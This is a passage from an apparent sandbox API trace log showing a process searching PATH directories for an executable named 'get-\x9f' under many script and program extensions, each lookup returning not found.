ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.362] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.362] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.JSE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.jse"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.362] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.362] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.362] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.362] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.WSF" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.wsf"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.363] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.363] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.363] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.363] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.WSH" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.wsh"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.363] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.364] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.364] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.MSC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.msc"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.364] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.364] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.364] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f.CPL" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f.cpl"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.365] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.365] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0280.365] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0280.365] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\get-\x9f" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\get-\x9f"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.365] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.365] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.ps1" (normalized: "c:\\windows\\system32\\get-\x9f.ps1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.366] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.366] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.psm1" (normalized: "c:\\windows\\system32\\get-\x9f.psm1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.366] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.366] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.psd1" (normalized: "c:\\windows\\system32\\get-\x9f.psd1"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.367] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.367] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.COM" (normalized: "c:\\windows\\system32\\get-\x9f.com"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.367] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.368] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.EXE" (normalized: "c:\\windows\\system32\\get-\x9f.exe"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.368] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.368] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.BAT" (normalized: "c:\\windows\\system32\\get-\x9f.bat"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.369] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.CMD" (normalized: "c:\\windows\\system32\\get-\x9f.cmd"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.369] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.369] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.VBS" (normalized: "c:\\windows\\system32\\get-\x9f.vbs"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.370] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.VBE" (normalized: "c:\\windows\\system32\\get-\x9f.vbe"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.370] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d720 | out: lpFileInformation=0x653ef8d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x6e511a15, ftLastAccessTime.dwHighDateTime=0x1daa6e5, ftLastWriteTime.dwLowDateTime=0x6e511a15, ftLastWriteTime.dwHighDateTime=0x1daa6e5, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0280.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.370] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\get-\x9f.JS" (normalized: "c:\\windows\\system32\\get-\x9f.js"), lpFindFileData=0x653ef8d3a0 | out: lpFindFileData=0x653ef8d3a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0280.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0280.371] GetFileAttributesExW (in: 